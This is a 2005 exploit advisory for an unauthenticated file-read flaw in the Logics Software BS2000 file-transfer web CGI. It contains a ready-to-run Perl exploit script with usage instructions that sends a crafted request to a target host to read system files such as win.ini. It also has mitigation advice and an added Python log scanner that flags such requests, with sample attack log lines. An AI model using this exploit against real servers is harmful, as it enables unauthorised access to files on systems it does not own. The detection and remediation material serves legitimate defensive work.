 Logics Filetransfer Read Access Exploit
Category: Vulnerability
Posted: 2005-04-07 by basher13
Update:
7:54 AM 4/7/2005

Subject:
" Logics Filetransfer Read Access Exploit "

Description:
Logics Software Filetransfer from BS2000 Host to Web Client

Vulnerability:
Without authentication or authorization it is possible to exploit
"File Transfer from BS2000 Host to Web Client" simply by replacing the
VAR_FT_* variables: VAR_FT_LANG selects the language that will be used
for templates and VAR_FT_TMPL selects the template to be used.

By replacing VAR_FT_LANG with "c:\" (or whatever) and VAR_FT_TMPL with the
file we want to read (e.g. winnt/win.ini) we get read access
to the requested resource (most files in the filesystem).



Exploit:
#!/usr/bin/perl
# Logics Filetransfer Read Access Exploit
# ---------------------------------------
#
# Greats: Pedro Viñuales,Román Ramírez (has discovered bug)
# Info: 98.to/infamous

use IO::Socket;   # provides IO::Socket::INET used below

if((!defined($ARGV[0]))||(!defined($ARGV[1])))
{
print "\nLogics Filetransfer Read Access Exploit\n\n";
print "------------------------------------------\n";
print "\n INFGP - Hacking&Security Research\n";
print "\n\n";
print "[-]Usage: logicfl.pl [target_host] [path] \n";
print "[!]Exam: logicfl.pl www.target.com logwebcgi\n\n";

exit 0;
}
print "\n[+]Connecting to $ARGV[0]..\n\n";
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
unless ($SOCKET)
{
die "[-]$ARGV[0] connection [FAILED]\n"
}
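print "[+]Target Connected\n";
# File requested through VAR_FT_TMPL, relative to the VAR_FT_LANG value
$win = "winnt/win.ini";
# The backslash is doubled so that "c:\" is sent literally, as described above
print $SOCKET "GET /$ARGV[1]/logwebftbs2000.exe?VAR_FT_LANG=c:\\&VAR_FT_TMPL=$win\n";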
print "[+]Sent evil request..\n";
while(<$SOCKET>) {
push @DATA, $_;

}
my $woot = join(' ',@DATA);
if($woot =~/$win wasn't found/)
{
print "[-]$win not found.\n";
exit 0;
}
else
{
print "[+]Print result..";
print "@DATA";
}



Solution:
The vendor was contacted but no response was received.
Look for a way to block access to the c:\ (/) resource from within this
tool; our recommendation, however, is to remove access to the bs2000
ftp executables and tools directly (everything inside the logwebcgi/ directory).
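
To check whether a server has already received requests of the kind described above, the following added example (not part of the original advisory and not vendor code) scans web server access-log lines for logwebftbs2000.exe requests whose VAR_FT_* values look like paths. It assumes common/combined log format and that legitimate VAR_FT_* values are plain tokens; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside the quoted field of a common/combined-format access log.
# The HTTP version is optional: the script above sends a bare "GET <url>" line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+)(?: HTTP/[\d.]+)?"')
CGI_NAME = "logwebftbs2000.exe"
# Assumption: legitimate VAR_FT_* values are short tokens such as a language
# code or template name, never a drive letter, path separator or "..".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def suspicious_params(url):
    """Return the VAR_FT_* parameters in url whose value looks like a path."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/" + CGI_NAME):
        return []
    hits = []
    for name, value in parse_qsl(parts.query):  # percent-decodes the values
        if not name.upper().startswith("VAR_FT_"):
            continue
        if ".." in value or not SAFE_VALUE.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Yield (line_number, client, hits) for each log line worth reviewing."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("url"))
        if hits:
            yield number, line.split(" ", 1)[0], hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2005:07:54:01 +0000] "GET /logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=en&VAR_FT_TMPL=list HTTP/1.0" 200 812',
    '198.51.100.7 - - [07/Apr/2005:07:55:12 +0000] "GET /logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\\&VAR_FT_TMPL=winnt/win.ini" 200 477',
    '198.51.100.7 - - [07/Apr/2005:07:55:40 +0000] "GET /logwebcgi/LOGWEBFTBS2000.EXE?VAR_FT_LANG=c%3A%5C&VAR_FT_TMPL=boot.ini HTTP/1.0" 200 211',
    '192.0.2.10 - - [07/Apr/2005:07:56:02 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for number, client, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {client} -> {hits}")
```

A hit with a 200 status is a candidate for review of what the response contained; the same pattern can serve as a blocking rule in front of the logwebcgi/ directory until the executables are removed.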



Vendor URL:
http://www.logics.de

 